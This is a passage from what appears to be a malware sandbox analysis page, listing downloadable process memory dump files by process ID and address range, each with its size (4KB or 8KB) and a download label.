                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/3572-420-0x000000007E3B0000-0x000000007E3B1000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/3572-342-0x0000000007382000-0x0000000007383000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/3572-341-0x0000000007380000-0x0000000007381000-memory.dmp

                                                                                                Filesize

                                                                                                4KB

                                                                                                Download

                                                                                              • memory/4036-270-0x000001A2B1D98000-0x000001A2B1D9A000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/4036-219-0x000001A2AFF70000-0x000001A2AFF72000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/4036-212-0x000001A2AFF70000-0x000001A2AFF72000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/4036-210-0x000001A2B1D93000-0x000001A2B1D95000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/4036-209-0x000001A2B1D90000-0x000001A2B1D92000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/4036-202-0x000001A2AFF70000-0x000001A2AFF72000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/4036-201-0x000001A2AFF70000-0x000001A2AFF72000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/4036-199-0x000001A2AFF70000-0x000001A2AFF72000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/4036-198-0x000001A2AFF70000-0x000001A2AFF72000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/4036-197-0x000001A2AFF70000-0x000001A2AFF72000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/4036-196-0x000001A2AFF70000-0x000001A2AFF72000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/4036-194-0x000001A2AFF70000-0x000001A2AFF72000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/4036-225-0x000001A2B1D96000-0x000001A2B1D98000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download

                                                                                              • memory/4036-195-0x000001A2AFF70000-0x000001A2AFF72000-memory.dmp

                                                                                                Filesize

                                                                                                8KB

                                                                                                Download